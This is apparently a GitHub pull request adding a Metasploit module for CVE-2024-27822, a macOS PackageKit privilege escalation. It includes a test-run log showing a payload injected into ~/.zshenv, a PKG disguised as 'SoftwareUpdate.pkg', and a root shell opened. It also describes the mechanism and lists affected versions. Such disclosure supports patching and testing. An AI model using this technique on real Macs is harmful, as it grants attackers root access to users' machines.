osx priv-esc cve-2024-27822#21499
Conversation
msutovsky-r7
left a comment
There was a problem hiding this comment.
msf exploit(osx/local/packagekit_zshenv_privesc) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. macOS 11.7.11 (11 and older) is vulnerable
[*] Injecting payload into /Users/ms/.zshenv
[*] Uploading PKG: /tmp/SoftwareUpdate.pkg
[+] PKG uploaded: /tmp/SoftwareUpdate.pkg
[!] Opening Installer.app - the user must click Install and authenticate.
[!] Tried to delete /Users/ms/.zshenv, unknown result
[*] Command shell session 2 opened (10.38.37.13:4444 -> 10.11.58.111:44973) at 2026-07-01 11:38:04 +0200
id
[*] exec: id
uid=1000(ms) gid=1000(ms) groups=1000(ms),3(sys),90(network),950(docker),956(libvirt),959(nopasswdlogin),979(rfkill),982(users),983(video),985(storage),989(lp),990(kvm),995(audio),998(wheel)
|
Review comments addressed, retested and got my shell still |
Release NotesThis adds a new local privilege escalation module for macOS targeting CVE-2024-27822 in PackageKit.framework. When a PKG installer script uses a ZSH shebang, PackageKit runs it as root while inheriting the installing user's environment, causing ZSH to source the user's |
fixes #19914
This PR adds an exploit for older MACs (like I have) with cve-2024-27822. Requires user interaction.
This module exploits CVE-2024-27822, a vulnerability in macOS
PackageKit.framework where PKG installer scripts using a ZSH shebang
(#!/bin/zsh) are executed as root while inheriting the installing user's
environment. This causes ZSH to load the user's ~/.zshenv with root
privileges before the installer script body runs.
The module injects a payload into ~/.zshenv that only fires when EUID is 0,
uploads a minimal PKG (from data/exploits/CVE-2024-27822/template.pkg) whose
install script uses a #!/bin/zsh shebang, and opens it with Installer.app.
When the user approves the installation dialog and authenticates, PackageKit
runs the install script as root. ZSH sources ~/.zshenv before the script body
executes, so the payload fires with root privileges. The original ~/.zshenv
content is restored immediately after the payload runs.
Affected: macOS 14.4 and earlier, 13.6.6 and earlier, 12.7.4 and earlier,
and all macOS 11 and older releases.
Fixed in: macOS 14.5, 13.6.7, 12.7.5.
Claude assisted in generating this code.
Verification
msfconsoleuse exploit/osx/local/packagekit_zshenv_privescexploit